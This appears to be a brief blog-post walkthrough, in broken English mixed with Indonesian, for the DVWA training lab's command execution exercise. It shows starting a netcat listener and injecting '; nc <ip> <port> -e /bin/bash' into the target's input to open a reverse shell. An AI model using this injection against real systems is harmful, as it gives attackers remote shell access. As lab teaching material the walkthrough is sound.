- Log in early halama DVWA.

- Choose the comman execution

- Enter the IP attaker

- Put ip Target
- Ateker type in terminal #nc -lvp (corresponding input port) and then enter

-Masukan Back ip Target
-Command Execution on the target web url ip target / dvwa / localhost; nc ip itself (the port that d choose) -e / bin / bash
-masuk to the terminal to see already masu atow not type in LS
Tidak ada komentar:
Posting Komentar